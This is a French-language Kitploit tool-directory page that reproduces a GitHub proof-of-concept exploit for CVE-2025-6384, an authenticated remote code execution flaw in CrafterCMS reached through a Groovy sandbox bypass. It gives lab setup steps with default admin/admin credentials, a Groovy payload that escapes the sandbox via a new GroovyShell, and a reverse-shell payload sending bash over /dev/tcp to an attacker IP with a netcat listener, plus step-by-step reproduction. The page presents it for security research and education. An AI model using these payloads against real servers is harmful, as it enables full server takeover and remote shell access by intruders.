Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CrafterCMS-CVE-2025-6384 — Exploit PoC pour une RCE authentifiée dans CrafterCMS via un contournement du sandbox Groovy (CVE-2025-6384) | Kitploit
Outils/GitHubGitHub/maestro-ant/craftercms-cve-2025-6384
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubmaestro-ant/craftercms-cve-2025-6384

CrafterCMS-CVE-2025-6384

Exploit PoC pour une RCE authentifiée dans CrafterCMS via un contournement du sandbox Groovy (CVE-2025-6384)

Voir le dépôt
13il y a 0 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CrafterCMS RCE authentifié - Contournement du sandbox Groovy (CVE-2025-6384)

Une preuve de concept pour une vulnérabilité d'exécution de code à distance authentifiée dans CrafterCMS.

Résumé de la vulnérabilité

Un utilisateur authentifié disposant de privilèges de développeur peut contourner le sandbox de scripts Groovy dans Crafter Studio pour exécuter du code à distance (RCE). Le sandbox ne parvient pas à bloquer l'instanciation d'un nouveau GroovyShell, qui peut être utilisé pour créer un nouvel environnement d'exécution sans restriction.

  • Produit : CrafterCMS
  • Composant : Crafter Studio
  • Vulnérabilité : RCE authentifié via contournement du sandbox Groovy (CWE-913)
  • Impact : Compromission totale du serveur

Configuration du laboratoire / Déploiement

Vous pouvez rapidement déployer une instance CrafterCMS vulnérable à des fins de test à l'aide des fichiers Docker Compose officiels.

  1. Clonez le dépôt docker-compose depuis CrafterCMS :

    git clone https://github.com/craftercms/docker-compose.git
    
  2. Accédez au répertoire de l'environnement de création :

    cd docker-compose/authoring
    
  3. Démarrez les conteneurs. Cela téléchargera les images nécessaires et démarrera la pile CrafterCMS.

    docker-compose up
    

    (Remarque : sudo peut être requis selon votre installation Docker.)

  4. Attendez que les services soient entièrement initialisés. Vous pouvez accéder à Crafter Studio à l'adresse http://localhost:8080/studio.

    • Nom d'utilisateur par défaut : admin
    • Mot de passe par défaut : admin

Preuve de concept (PoC)

Bien que le sandbox bloque correctement les méthodes d'exécution directes, il autorise la charge utile suivante, qui crée un nouveau shell Groovy non sandboxé.

// File: /scripts/interceptors/pwn.groovy

def shell = new GroovyShell()
def command = "id" // <-- Your command here
def result = shell.evaluate("'''${command}'''.execute().text")

// The output is printed to the server logs
System.err.println("[RCE-PoC] " + result)

Exploit RCE : Reverse Shell

Cette charge utile démontre une RCE complète en établissant un reverse shell vers une machine contrôlée par l'attaquant.

1. Démarrer un listener

Sur votre machine, démarrez un listener (par exemple avec netcat) pour recevoir la connexion entrante :

nc -lvnp 4444

2. Préparer la charge utile

Utilisez le script Groovy suivant comme charge utile. N'oubliez pas de remplacer <YOUR_IP> et <YOUR_PORT> par l'adresse IP et le port de votre listener.

// File: /scripts/interceptors/exploit.groovy

def attacker_ip = "<YOUR_IP>"
def attacker_port = "4444" // Or <YOUR_PORT>

def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
def shell = new GroovyShell()

// Use triple quotes to handle the command string easily
shell.evaluate("""
    new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
""")

System.err.println("Reverse shell payload executed.")

Étapes pour reproduire

  1. Connectez-vous à Crafter Studio (http://localhost:8080/studio) avec les identifiants par défaut (admin / admin).

  2. Accédez à Site Config -> Scripts.

  3. Cliquez sur Create/Edit Script dans la section « Groovy Scripts ».

    image
  4. Choisissez un type de script qui sera exécuté, par exemple Request Interceptor.

  5. Collez la charge utile PoC dans l'éditeur de script et enregistrez-la.

    image
  6. Déclenchez le script en visitant n'importe quelle page du site web (par exemple, http://localhost:8080).

  7. Consultez les logs d'erreur standard du serveur pour voir la sortie de la commande.

    • Pour la PoC, trouvez l'ID de votre conteneur et vérifiez ses logs pour voir la sortie de la commande :
    docker-compose logs -f crafter
    

    Sortie attendue :

    GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
    
    image
    • Pour le Reverse Shell, vérifiez votre listener netcat. Vous devriez recevoir une session shell depuis le conteneur. image

Avertissement

Ce matériel est fourni uniquement à des fins éducatives et de recherche. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ces informations.

Télécharger l’outil